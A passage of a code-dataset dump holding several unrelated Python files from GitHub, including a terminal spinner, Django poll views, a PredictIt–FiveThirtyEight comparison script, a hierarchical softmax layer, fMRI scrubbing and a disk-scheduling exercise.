Valid styles are: {self.__styles.keys()}\")\r\n\r\n self._style = self.__styles[style]\r\n \"\"\"The current loader style.\"\"\"\r\n\r\n self.refresh_interval_ms = refresh_interval_ms\r\n \"\"\"The amount of time to wait before showing the next frame.\"\"\"\r\n\r\n self._message: Optional[str] = message\r\n \"\"\"If specified, a message to be displayed alongside the loader.\"\"\"\r\n\r\n self.show_timer = show_timer\r\n \"\"\"Whether the loading 'timer' should be prepended to the loader message.\"\"\"\r\n\r\n self.__thread: Optional[Thread] = None\r\n self.__frame: Optional[str] = None\r\n self.__start_time: Optional[int] = None\r\n\r\n self.__stdout_proxy = None\r\n self.__stderr_proxy = None\r\n\r\n self.__rendering = False\r\n \"\"\"Mutex for spinning status.\"\"\"\r\n\r\n def start(self, message: Optional[str] = None) -> Self:\r\n if self.__thread is not None:\r\n return\r\n\r\n if message is not None:\r\n self._message = message\r\n\r\n self.__start_time = int(time.time())\r\n\r\n # Install a standard output proxy if there isn't already one.\r\n self.__stdout_proxy = SysioProxy()\r\n sys.stdout = self.__stdout_proxy\r\n\r\n self.__stderr_proxy = SysioProxy()\r\n sys.stderr = self.__stderr_proxy\r\n\r\n self.__thread = Thread(target=self.__spin, daemon=True)\r\n self.__thread.start()\r\n\r\n return self\r\n\r\n def __render_frame(self):\r\n self.__rendering = True\r\n\r\n # Clear existing frame and return to start.\r\n if self.__frame is not None:\r\n self.__erase_line()\r\n sys.__stdout__.flush()\r\n\r\n # Check if the standard output proxy is waiting to print data.\r\n self.__flush_proxy(proxy=self.__stdout_proxy, stream=sys.__stdout__)\r\n self.__flush_proxy(proxy=self.__stderr_proxy, stream=sys.__stderr__)\r\n\r\n # Render new frame.\r\n self.__frame = next(self._style)\r\n self.__frame += (f' {self._message}' if self._message is not None else '')\r\n self.__frame += (f' ({int(time.time()) - self.__start_time}s)'\r\n if self.__start_time is not None and self.show_timer\r\n else '')\r\n self.__frame = f'\\033[0;90m\\033[1;97m{self.__frame}\\033[0m'\r\n # Write the current frame, then jump to start of line.\r\n sys.__stdout__.write(\"\\033[s\")\r\n sys.__stdout__.write(self.__frame)\r\n sys.__stdout__.write(\"\\033[u\")\r\n # Flush output to prevent flickering.\r\n sys.__stdout__.flush()\r\n\r\n # Wait for next frame.\r\n self.__rendering = False\r\n\r\n def __spin(self):\r\n while self.__thread is not None:\r\n if self.__rendering:\r\n continue\r\n\r\n self.__render_frame()\r\n\r\n time.sleep(self.refresh_interval_ms / 1000)\r\n\r\n def stop(self) -> int:\r\n if self.__thread is None:\r\n return -1\r\n\r\n thread = self.__thread\r\n self.__thread = None\r\n thread.join()\r\n\r\n runtime = int(time.time()) - self.__start_time\r\n self.__start_time = None\r\n\r\n # Clear existing frame and return to start.\r\n sys.__stdout__.flush()\r\n\r\n # Restore standard output.\r\n if sys.stdout is not sys.__stdout__:\r\n sys.stdout = sys.__stdout__\r\n if sys.stderr is not sys.__stderr__:\r\n sys.stderr = sys.__stderr__\r\n\r\n if self.__frame is not None:\r\n self.__erase_line()\r\n sys.__stdout__.flush()\r\n\r\n # Flush any remaining proxied output\r\n self.__flush_proxy(proxy=self.__stdout_proxy, stream=sys.__stdout__)\r\n self.__flush_proxy(proxy=self.__stderr_proxy, stream=sys.__stderr__)\r\n\r\n # Return elapsed time (seconds).\r\n return runtime\r\n\r\n def get_proxy(self, stream):\r\n if stream == sys.__stdout__:\r\n return self.__stdout_proxy\r\n elif stream == sys.__stderr__:\r\n 
return self.__stderr_proxy\r\n return None\r\n\r\n @staticmethod\r\n def __flush_proxy(proxy: SysioProxy, stream: TextIOWrapper):\r\n if proxy is not None and proxy.tell() > 0:\r\n value = proxy.getvalue()\r\n\r\n proxy.seek(0)\r\n proxy.truncate(0)\r\n\r\n stream.write(value)\r\n stream.flush()\r\n\r\n def __erase_line(self):\r\n sys.__stdout__.write('\\033[K')\r\n sys.__stdout__.write('\\b' * self.__frame_length())\r\n sys.__stdout__.write(' ' * self.__frame_length())\r\n sys.__stdout__.write('\\b' * self.__frame_length())\r\n\r\n def __frame_length(self) -> int:\r\n ansi_escape = re.compile(r'(\\x9B|\\x1B\\[)[0-?]*[ -/]*[@-~]')\r\n ansi_escapes_length = (len(self.__frame) - len(ansi_escape.sub('', self.__frame)))\r\n\r\n return max(len(self.__frame) - ansi_escapes_length, 0)\r\n\r\n\r\ndef load_while(execute: Callable, **kwargs):\r\n loader = Loader(**kwargs).start()\r\n result = execute()\r\n loader.stop()\r\n return result\r\n","repo_name":"SamJakob/thornhill","sub_path":"scripts/hotreload/src/utils/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"25768203282","text":"import time\nimport gc\nimport torch\nimport math\nimport albumentations as A\nimport numpy as np\n\nfrom albumentations.pytorch import ToTensorV2\nfrom torch.utils.data import DataLoader\nfrom torchvision.utils import save_image\nfrom tqdm import tqdm\n# from torchsummary import summary\n# from torchmetrics import PeakSignalNoiseRatio\nfrom skimage import color\nfrom skimage.metrics import structural_similarity\n\nfrom Utils import load_checkpoint\nfrom Dataset import ABDataset\nfrom Model import Generator\n\ngc.collect()\ntorch.cuda.empty_cache()\n\ndataset_name = \"EyeQ\" # \"EyeQ\" \"Mendeley\"\n\npath = \"Results\"\ncheckpoint = \"Results/genb.pth.tar\"\nsave_path = f\"Results/Testing {dataset_name}\"\nTEST_DIR = f\"datasets/{dataset_name}/test\"\n\n\ndef masking(a, b):\n l_top = l_bottom = 0\n a = a[0]\n b = b[0]\n\n for i in range(a.shape[1]):\n if torch.sum(a[:, i, :]) != 0:\n break\n l_top += 1\n\n for i in range(a.shape[1]):\n if torch.sum(a[:, a.shape[1] - i - 1, :]) != 0:\n break\n l_bottom += 1\n\n b[:, :l_top, :] = 0\n b[:, b.shape[1] - l_bottom:, :] = 0\n\n return a, b\n\n\ndef PSNR_SSIM(orig_img, gen_img):\n gray_orig_img = color.rgb2gray(orig_img)\n gray_gen_img = color.rgb2gray(gen_img)\n\n mse = np.mean((gray_orig_img - gray_gen_img) ** 2)\n if mse == 0:\n psnr = 100\n else:\n max_pixel = 1.0\n psnr = 20 * math.log10(max_pixel / math.sqrt(mse))\n\n ssim = structural_similarity(gray_orig_img, gray_gen_img, multichannel=False, data_range=1.0)\n\n return round(psnr, 3), round(ssim, 3)\n\norig_img, gen_img = \"real_0.png\", \"fake_0.png\"\npsnr, ssim = PSNR_SSIM(orig_img, gen_img)\nprint(psnr, ssim)\n\n","repo_name":"Jayc-Z/derain","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"34310370913","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse\n\nfrom .models import Choice, Question\n\n\ndef index(request):\n latest_question_list = Question.objects.order_by('-pub_date')\n context = {'latest_question_list': latest_question_list}\n return render(request, 'poll/index', context)\n\n # to:LEARN add pagination\n\n\ndef results(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'poll/results', {'question': question})\n\n\ndef vote(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n try:\n selected_choice = question.choice_set.get(pk=request.POST['choice'])\n except (KeyError, Choice.DoesNotExist):\n # Redisplay the question voting form.\n return render(request, 'poll/vote', {\n 'question': question,\n 'error_message': \"You didn't select a choice.\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.save()\n # Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect(reverse('poll:results', args=(question.id,)))\n","repo_name":"aahnik/django-polling-site","sub_path":"pollsite/poll/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"70"}
+{"seq_id":"39335758896","text":"import re\nfrom datetime import datetime\n\nimport pandas as pd\nimport requests\n\n_FORECAST_EXPRESSION = '_deluxe'\n_MIN_PROFIT_PER_SHARE = 0.075\n_SIDES = ('buy', 'sell')\n_FTE_BASE_URL = 'https://projects.fivethirtyeight.com/2022-general-election-forecast-data/'\n_CHAMBERS = dict(\n names=['senate', 'governor'],\n patterns=dict(\n senate='Which party will win the ([A-Z]{2}) (Sen)ate race',\n governor='Which party will win ([A-Z]{2}) (gov)ernor\\'s race?',\n ),\n filenames=dict(\n senate='senate_state_toplines_2022.csv',\n governor='governor_state_toplines_2022.csv',\n ),\n)\n\n\ndef _get_pi_contracts(market: dict, contract: dict) -> dict:\n contract_data = dict((f'm{market_field}', market[market_field]) for market_field in ('shortName', 'url'))\n contract_data.update(dict((f'c{contract_field}', contract[contract_field]) for contract_field in (\n 'name', 'bestBuyYesCost', 'bestBuyNoCost', 'bestSellYesCost', 'bestSellNoCost')))\n return contract_data\n\n\ndef _get_pi_markets(markets: dict) -> pd.DataFrame:\n market_data = []\n for market in markets['markets']:\n market_data.extend(_get_pi_contracts(market, contract) for contract in market['contracts'])\n return pd.DataFrame(market_data).drop_duplicates()\n\n\ndef get_pi_data() -> pd.DataFrame:\n markets = requests.get('https://www.predictit.org/api/marketdata/all/').json()\n return _get_pi_markets(markets)\n\n\ndef _filter_pi_data(pi_data: pd.DataFrame, chamber: str) -> pd.DataFrame:\n pattern = _CHAMBERS['patterns'][chamber]\n pi_data = pi_data.rename(columns=dict((i, i.replace('cbest', 'best')) for i in pi_data.columns))\n shortname_with_pattern = pi_data.mshortName.apply(lambda x: re.search(pattern, x))\n pi_data['state'] = shortname_with_pattern.apply(lambda x: x.group(1) if x else None)\n pi_data['seat'] = shortname_with_pattern.apply(lambda x: '-'.join(x.groups()).upper() if x else None)\n return pi_data\n\n\ndef _get_fte_data(chamber: str) -> pd.DataFrame:\n filename = _CHAMBERS['filenames'][chamber]\n fte = pd.read_csv(_FTE_BASE_URL + filename, usecols=['district', 'expression', 'winner_Dparty', 'winner_Rparty'])\n fte = fte[fte.expression == _FORECAST_EXPRESSION].drop_duplicates(keep='first', subset='district')\n fte['state'] = fte.district.apply(lambda x: x.split('-', 1)[0])\n fte = fte.drop(columns=['expression', 'district'])\n return fte\n\n\ndef merge_fte_and_pi(pi_data: pd.DataFrame, chamber: str) -> pd.DataFrame:\n chamber = chamber.lower()\n pi = _filter_pi_data(pi_data, chamber)\n pi = pi[pi.state.notna()].copy()\n fte = _get_fte_data(chamber)\n\n _separate_by_party = lambda party: pi[pi.cname == party].drop(columns='cname')\n pi = _separate_by_party('Democratic').merge(_separate_by_party('Republican'), on=[\n 'mshortName', 'murl', 'state', 'seat'], suffixes=('D', 'R'))\n\n merged = pi.merge(fte, on='state').drop(columns=['state']).rename(columns=dict(\n winner_Dparty='fteD', winner_Rparty='fteR'))\n return merged\n\n\ndef add_profit_columns(merged: pd.DataFrame) -> None:\n merged['profit_bestBuyYesCostD'] = merged.fteD - merged.bestBuyYesCostD\n merged['profit_bestBuyNoCostR'] = merged.fteD - merged.bestBuyNoCostR\n merged['profit_bestBuyYesCostR'] = merged.fteR - merged.bestBuyYesCostR\n merged['profit_bestBuyNoCostD'] = merged.fteR - merged.bestBuyNoCostD\n\n merged['profit_bestSellYesCostD'] = merged.bestSellYesCostD - merged.fteD\n merged['profit_bestSellNoCostR'] = merged.bestSellNoCostR - merged.fteD\n merged['profit_bestSellYesCostR'] = merged.bestSellYesCostR - merged.fteR\n 
merged['profit_bestSellNoCostD'] = merged.bestSellNoCostD - merged.fteR\n\n\ndef add_action_columns(merged: pd.DataFrame, side: str) -> pd.DataFrame:\n cost_columns = list(map(lambda x: x.format(side.title()), (\n 'best{}YesCostD', 'best{}NoCostR', 'best{}YesCostR', 'best{}NoCostD')))\n merged = merged.reset_index(drop=True)\n transposed = merged[[f'profit_{i}' for i in cost_columns]].transpose()\n addnl = [{\n 'actionRec': re.search('profit_best(Buy|Sell)(Yes|No)Cost([DR])', transposed[i].idxmax()),\n 'actionProfit': transposed[i].max(),\n } for i in transposed]\n\n merged = merged.join(pd.DataFrame(addnl))\n merged.actionRec = merged.actionRec.apply(lambda x: x.groups()).apply(\n lambda x: '{} {} on the {}'.format(x[0], x[1], dict(D='Democrat', R='Republican')[x[2]]))\n merged['actionSide'] = side\n return merged\n\n\ndef create_fte_and_pi_comparison() -> pd.DataFrame:\n pi_data = get_pi_data()\n merged = pd.concat(merge_fte_and_pi(pi_data, chamber) for chamber in _CHAMBERS['names'])\n add_profit_columns(merged)\n merged = pd.concat(add_action_columns(merged, side) for side in _SIDES)\n merged = merged[merged.actionProfit >= _MIN_PROFIT_PER_SHARE].copy()\n\n merged.fteD = merged.fteD.round(2)\n merged.fteR = merged.fteR.round(2)\n merged.actionProfit = merged.actionProfit.round(2)\n\n merged = pd.concat(\n merged[merged.actionSide == side].sort_values('actionProfit', ascending=False) for side in _SIDES)\n return merged\n\n\ndef create_html_page(merged: pd.DataFrame) -> None:\n summary = merged.groupby('actionRec', as_index=False).agg(dict(murl='count', seat=', '.join)).sort_values(\n by='murl', ascending=False)\n forecast_exp_title = _FORECAST_EXPRESSION[1:].title()\n\n market_item_template = open('templates/market_item.html').read()\n market_item_costs_template = open('templates/market_item_costs.html').read()\n summary_item_template = open('templates/summary_item.html').read()\n\n items = [\n market_item_template.format(\n forecast_expression=forecast_exp_title,\n costs=market_item_costs_template.format(actionSideTitle=i['actionSide'].title()).format(**i),\n **i,\n ) for i in merged.to_dict('records')\n ]\n items.insert(5, open('templates/notes_item.html').read().format(\n forecast_expression=forecast_exp_title, min_profit_per_share=_MIN_PROFIT_PER_SHARE))\n links_idx = 9\n html = open('templates/page.html').read().format(\n data0='\\n'.join(items[:links_idx]),\n data1='\\n'.join(items[links_idx:]),\n summary='\\n'.join(summary_item_template.format(**i) for i in summary.to_dict('records')),\n update_interval='hourly',\n last_updated=datetime.now().strftime('%d %B %Y %H:%M'),\n )\n with open('index.html', 'w') as f:\n f.write(html)\n\n\ndef create_csv(merged: pd.DataFrame) -> None:\n for col in merged.columns:\n if col.startswith('profit_'):\n merged[col] = merged[col].round(2)\n merged.to_csv('data/opportunities.csv', index=False)\n\n\ndef main():\n merged = create_fte_and_pi_comparison()\n create_html_page(merged)\n create_csv(merged)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dcadata/fivethirtyeight-vs-predictit","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":6830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"34717260242","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\n\nclass HierarchicalSoftmax(nn.Module):\n def __init__(self, ntokens, nhid, ntokens_per_class=None):\n super(HierarchicalSoftmax, self).__init__()\n\n # Parameters\n self.ntokens = ntokens\n self.nhid = nhid\n\n if ntokens_per_class is None:\n ntokens_per_class = int(np.ceil(np.sqrt(ntokens)))\n\n self.ntokens_per_class = ntokens_per_class\n\n self.nclasses = int(np.ceil(self.ntokens * 1. / self.ntokens_per_class))\n self.ntokens_actual = self.nclasses * self.ntokens_per_class\n\n self.layer_top_W = nn.Parameter(torch.FloatTensor(self.nhid, self.nclasses), requires_grad=True)\n self.layer_top_b = nn.Parameter(torch.FloatTensor(self.nclasses), requires_grad=True)\n\n self.layer_bottom_W = nn.Parameter(torch.FloatTensor(self.nclasses, self.nhid, self.ntokens_per_class), requires_grad=True)\n self.layer_bottom_b = nn.Parameter(torch.FloatTensor(self.nclasses, self.ntokens_per_class), requires_grad=True)\n\n self.softmax = nn.Softmax(dim=1)\n\n self.init_weights()\n\n def init_weights(self):\n\n initrange = 0.1\n self.layer_top_W.data.uniform_(-initrange, initrange)\n self.layer_top_b.data.fill_(0)\n self.layer_bottom_W.data.uniform_(-initrange, initrange)\n self.layer_bottom_b.data.fill_(0)\n\n def forward(self, inputs, labels=None):\n\n batch_size, d = inputs.size()\n\n if labels is not None:\n\n label_position_top = labels / self.ntokens_per_class\n label_position_bottom = labels % self.ntokens_per_class\n\n layer_top_logits = torch.matmul(inputs, self.layer_top_W) + self.layer_top_b\n layer_top_probs = self.softmax(layer_top_logits)\n\n layer_bottom_logits = torch.squeeze(torch.bmm(torch.unsqueeze(inputs, dim=1),\n self.layer_bottom_W[label_position_top]), dim=1) + self.layer_bottom_b[label_position_top]\n layer_bottom_probs = self.softmax(layer_bottom_logits)\n\n target_probs = layer_top_probs[torch.arange(batch_size).long(), label_position_top] * layer_bottom_probs[torch.arange(batch_size).long(), label_position_bottom]\n\n return target_probs\n\n else:\n # Remain to be implemented\n layer_top_logits = torch.matmul(inputs, self.layer_top_W) + self.layer_top_b\n layer_top_probs = self.softmax(layer_top_logits)\n\n word_probs = layer_top_probs[:,0] * self.softmax(torch.matmul(inputs, self.layer_bottom_W[0]) + self.layer_bottom_b[0])\n\n for i in range(1, self.nclasses):\n word_probs = torch.cat((word_probs, layer_top_probs[:,i] * self.softmax(torch.matmul(inputs, self.layer_bottom_W[i]) + self.layer_bottom_b[i])), dim=1)\n\n return word_probs\n\n\nloss = HierarchicalSoftmax(10, 300)\ninput = torch.randn(16, 300)\noutput = loss(input)\nprint(output.shape)\n","repo_name":"Bigwode/3-leetcode-everyday","sub_path":"networks/4.cifar/HierarchicalSoftmax.py","file_name":"HierarchicalSoftmax.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"6907184740","text":"# HW5 Task3\n# Po-Han Chen USCID: 3988044558\n# Apr 05 2021\n\n\nimport sys\nimport time\nfrom blackbox import BlackBox\nimport random\n\nif __name__ == \"__main__\":\n random.seed(553)\n # parse command line arguments\n input_path = sys.argv[1]\n stream_size = int(sys.argv[2])\n num_of_asks = int(sys.argv[3])\n output_path = sys.argv[4]\n\n \"\"\"\n Start timer\n \"\"\"\n start_time = time.time()\n bx = BlackBox()\n\n # keep track of the sample\n sample = []\n # keep track of the number of users arrived so far\n n = 0\n # size of the sample\n s = 100\n sequence_string = \"\"\n for _ in range(num_of_asks):\n stream_users = bx.ask(input_path, stream_size)\n if _ > 0:\n for user in stream_users:\n n += 1\n prob_keep = random.random()\n if prob_keep < s/n:\n position = random.randint(0, 99)\n sample[position] = user\n else:\n for user in stream_users:\n sample.append(user)\n n = 100\n sequence_string += str(n) + \",\" + sample[0] + \",\" + sample[20] + \",\" + sample[40] + \",\" + sample[60] + \",\" + sample[80] + \"\\n\"\n res = \"seqnum,0_id,20_id,40_id,60_id,80_id\\n\"\n res += sequence_string\n with open(output_path, \"w\") as out_file:\n out_file.writelines(res)\n print(res)\n \"\"\"\n Stop timer\n \"\"\"\n duration = time.time() - start_time\n print(\"Duration: \" + str(duration))\n","repo_name":"pohann/DSCI553","sub_path":"HW5/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"31215186819","text":"# class DiskScheduler:\n# \tdef __init__(self,schedulername):\n# \t\tself.schedulername = schedulername\n# \t\tself.head = None\n# \t\tself.requests = []\n# \tdef __repr__(self):\n# \t\treturn(str(self.schedulername))\n\n# def seek(requests,head):\n# \ttime = 0\n# \tserved = []\n# \tstart = requests.index(head)\n# \tfor i in range(start,len(requests)-1):\n# \t\tst = abs((requests[i+1]-requests[i]))\n# \t\tprint(f\"From {requests[i]} to {requests[i+1]}, seektime:{st}\")\n# \t\tserved += [requests[i]]\n# \t\ttime += st\n# \tremaining = [i for i in requests if i not in served]\n# \tremaining.sort(reverse=True)\n# \tfor i in range(len(remaining)-1):\n# \t\tst = abs((remaining[i+1]-remaining[i]))\n# \t\tprint(f\"From {remaining[i]} to {remaining[i+1]}, seektime:{st}\")\n# \t\tserved += [remaining[i]]\n# \t\ttime += st\n# \tserved.append(remaining[i+1])\n# \treturn ((f\" Seektime: {time}\\n Average Time: {time/len(requests)}\"),served)\n\n\n\n# scheduler = DiskScheduler(\"SCAN\")\n# print(\"Give Request Order\")\n# scheduler.requests += map(int,input().split(','))\n# scheduler.head = int(input(\"Give initial header\"))\n# timeaxis = [i for i in range(len(scheduler.requests)+1)]\n# requestaxis = [scheduler.head] + scheduler.requests\n# requestaxis.sort()\n# time,served = seek(requestaxis,scheduler.head)\n# print(time)\n\ndef SCAN(hp,reqs,num):\n\trequests = reqs.copy()\n\tpos = hp\n\ttime = 0\n\tend=200-1\n\tstart=0\n\tflag=True\n\tfor i in range(pos,end+1):\n\t\tif i in requests:\n\t\t\ttemp=pos\n\t\t\ttime+=abs(pos-i)\n\t\t\tpos=i\n\t\t\tnum=num-1\n\t\t\tprint(\" \",i,\" seeked with seek time \",abs(temp-i))\n\t\t\trequests.remove(i)\n\tif(num!=0):\n\t time+=abs(pos-end)\n\t print(\" \",end,\" seeked with seek time \",abs(pos-end))\n\t pos=end\n\t for i in range(end,start-1,-1):\n\t\t if i in requests:\n\t\t\t temp=pos\n\t\t\t time+=abs(pos-i)\n\t\t\t pos=i\n\t\t\t print(\" \",i,\" seeked with seek time:\",abs(temp-i))\n\t\t\t requests.remove(i)\n\tprint(time)\n\tavg_seek_time = time/n\n\tprint(\"Total time \",time)\n\treturn avg_seek_time\n\nif __name__=='__main__':\n\tprint(\"\\n\\n\\n ********** SCAN *********\\n\\n\\n\")\n\tprint(\"DISK SCHEDULING:\")\n\tprint(\"Provide number of I/O requests\")\n\tn = int(input())\n\tprint(\"Provide initial position of disc arm (total cylinders=200)\")\n\thp = int(input())\n\twhile hp>200:\n\t\tprint(\"!!! INVALID !!! try again\")\n\t\thp = int(input())\t\n\tprint(\"Provide positions to visit : max is 200\")\n\trequests = []\n\tfor i in range(n):\n\t\treq = int(input())\n\t\trequests.append(req)\n\n\tprint(requests)\n\n\tprint(\"Avg seek time for scan was \",\n\t\tSCAN(hp,requests,n))","repo_name":"alphin-roy2000/System-Software-Lab","sub_path":"EXP5/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41923654483","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.comparator_function_parameter_map import ComparatorFunctionParameterMap\n\n\nT = TypeVar(\"T\", bound=\"ComparatorFunction\")\n\n\n@attr.s(auto_attribs=True)\nclass ComparatorFunction:\n \"\"\"\n Attributes:\n function_name (Union[Unset, str]):\n parameter_map (Union[Unset, ComparatorFunctionParameterMap]):\n \"\"\"\n\n function_name: Union[Unset, str] = UNSET\n parameter_map: Union[Unset, \"ComparatorFunctionParameterMap\"] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n function_name = self.function_name\n parameter_map: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.parameter_map, Unset):\n parameter_map = self.parameter_map.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if function_name is not UNSET:\n field_dict[\"functionName\"] = function_name\n if parameter_map is not UNSET:\n field_dict[\"parameterMap\"] = parameter_map\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.comparator_function_parameter_map import ComparatorFunctionParameterMap\n\n d = src_dict.copy()\n function_name = d.pop(\"functionName\", UNSET)\n\n _parameter_map = d.pop(\"parameterMap\", UNSET)\n parameter_map: Union[Unset, ComparatorFunctionParameterMap]\n if isinstance(_parameter_map, Unset):\n parameter_map = UNSET\n else:\n parameter_map = ComparatorFunctionParameterMap.from_dict(_parameter_map)\n\n comparator_function = cls(\n function_name=function_name,\n parameter_map=parameter_map,\n )\n\n comparator_function.additional_properties = d\n return comparator_function\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"JamesG419/openempi","sub_path":"open-empi-client/open_empi_client/models/comparator_function.py","file_name":"comparator_function.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"74483171426","text":"def scrub_vols(infile, qadir, data_dir,\n motfile ,subject, scan):\n\n import numpy as np\n import nibabel as nb\n import os, sys\n from time import sleep\n\n\n print('#####################')\n print('#####################')\n print('#####################')\n\n\n if os.path.isdir(qadir):\n\n #sleep(0.05)\n\n # check if scrubvols.txt exists\n scrub_file = qadir + '/scrubvols.txt'\n\n if os.path.isfile(scrub_file):\n\n print('scrubvols.txt for ' + subject + ' ' + scan + ' exists! perform hd fix & scrubbing')\n\n #load 4d nifti image\n nifti = nb.load(infile)\n img = nb.Nifti1Image(nifti.get_data()[:, :, :, :], nifti.get_affine())\n print(img.header['pixdim'][4])\n img.header['pixdim'][4] = 1.4\n print(img.header['pixdim'][4])\n\n\n #read scrubvols.txt to get volumes that need to be scrubbed (minus 1 because deviant starting point, in python first vol = 0)\n with open(scrub_file) as f:\n vols = f.read().splitlines()\n vols_array = np.array(list(map(int, vols)))\n vols_array_minus1 = vols_array - 1\n\n #read prefiltered_func_data_mcf.par from feat/mc dir & delete volumes from realignment parameter, because they are used to classify motion within ICA AROMA\n with open(motfile) as mopar:\n content_mopar = mopar.read().splitlines()\n content_mopar_array = np.array(content_mopar)\n\n content_mopar = np.delete(content_mopar_array, vols_array_minus1)\n\n #write updated prefiltered_func_data_mcf_scrubbed.par\n mopar_scrubbed = data_dir + '/' + subject + '/preprocessed/functional/' + scan + '.feat/mc/prefiltered_func_data_mcf_scrubbed.par'\n with open(mopar_scrubbed, 'w') as mopar_scrubbed_file:\n mopar_scrubbed_file.write(\"\\n\".join(map(str, content_mopar)))\n mopar_scrubbed_file.close()\n\n #scrub volumes from 4d nifti img\n scrubbed_array = np.delete(img.dataobj, vols_array_minus1, axis=3)\n\n #transform numpy array to nifti object, with the dimensions from the original image\n scrubbed_img = nb.Nifti1Image(scrubbed_array, img.get_affine())\n #scrubbed_img.header['pixdim'][4] = 1.4\n\n # create empty outfile\n tmp = scan + '.feat/'\n out_file = os.path.join(data_dir, subject, 'preprocessed/functional', tmp, 'scrubbed_filtered_func_data.nii.gz')\n\n # assign ts to out_file\n scrubbed_img.to_filename(out_file)\n\n #return out_file\n\n\n else:\n print( 'Nothing to scrub but changing TR-info in header to 1.4 sec for ' + subject + ' ' + scan )\n img = nb.load(infile)\n img.header['pixdim'][4] = 1.4\n #print(img.header['pixdim'][4])\n\n # create empty outfile\n tmp = scan + '.feat/'\n out_file = os.path.join(data_dir, subject, 'preprocessed/functional', tmp, 'filtered_func_data.nii.gz')\n\n # assign ts to out_file\n img.to_filename(out_file)\n\n else:\n sys.exit('QA_dir does not exist!')\n #print('QA_dir does not exist!')\n\n print('#####################')\n print('#####################')\n print('#####################')\n\n\n #return out_file\n\n\n","repo_name":"fBeyer89/RSV_rsanalysis","sub_path":"quality_reports/poldrack_qa/scrub_vols.py","file_name":"scrub_vols.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"26352885472","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 18 00:52:17 2019\n\n@author: moskovkina\n\n4. Определить, какое число в массиве встречается чаще всего.\n\"\"\"\nfrom random import randint\n\nn = int(input(\"Введите длинну массива: \"))\nnums = [randint(0, 10) for i in range(n)]\nmax_cnt = 0\nmax_num = 0\nfor i in nums:\n if nums.count(i) > max_cnt:\n max_num = i\n max_cnt = nums.count(i)\n\nprint()\nprint(f'Число {max_num} встречается в массиве чаще всего: {max_cnt} раз(а)')","repo_name":"TataMoskovkina/GeekUniversity","sub_path":"Алгоритмы и структуры данных на Python/HW_3_task_4.py","file_name":"HW_3_task_4.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22199143486","text":"import torch\nfrom torch._subclasses import FakeTensor\nfrom torch.utils._mode_utils import no_dispatch\nimport builtins\nimport warnings\nfrom typing import Callable, Dict, Optional, Union, List\n\n\n_compiler_backend = \"inductor\"\n\n\ndef _get_compiler_backend():\n return _compiler_backend\n\n\ndef _set_compiler_backend(backend=\"inductor\"):\n global _compiler_backend\n _compiler_backend = backend\n\n\ndef compile(\n model: torch.fx.GraphModule,\n example_inputs: List[torch.Tensor],\n mode: Union[str, None] = None,\n options: Optional[Dict[str, Union[str, builtins.int, builtins.bool]]] = None,\n) -> Callable:\n def defake(x):\n if not isinstance(x, FakeTensor):\n return x\n if x._has_symbolic_sizes_strides:\n size = [\n s.node.shape_env.size_hint(s.node.expr)\n if isinstance(s, torch.SymInt)\n else s\n for s in x.size()\n ]\n stride = [\n s.node.shape_env.size_hint(s.node.expr)\n if isinstance(s, torch.SymInt)\n else s\n for s in x.stride()\n ]\n else:\n size = x.size()\n stride = x.stride()\n y = torch.empty_strided(\n size,\n stride,\n dtype=x.dtype,\n device=x.device,\n requires_grad=x.requires_grad,\n )\n y.zero_()\n return y\n\n if _get_compiler_backend() == \"inductor\":\n from .compile_fx import compile_fx\n\n return compile_fx(model, example_inputs, mode, options)\n elif _get_compiler_backend() == 